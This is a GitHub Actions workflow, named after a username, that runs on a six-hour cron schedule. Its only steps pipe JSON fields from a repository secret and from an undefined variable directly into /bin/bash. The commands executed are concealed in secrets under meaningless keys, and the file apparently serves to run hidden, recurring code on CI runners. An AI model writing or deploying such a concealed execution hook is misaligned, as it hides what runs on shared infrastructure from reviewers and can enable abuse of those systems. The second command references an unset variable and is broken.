name: yanqinwang5678
on:
  workflow_dispatch:
  schedule:
    - cron: '21 5/6 * * *'

jobs:  # 16804
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yanqinwang5678
        env:
          dg9: ${{ secrets.dg9 }}
        run: |
          echo $dg9 | jq -r .gtvbi2 | /bin/bash
          echo $d30112 | jq -r .wkm9 | /bin/bash

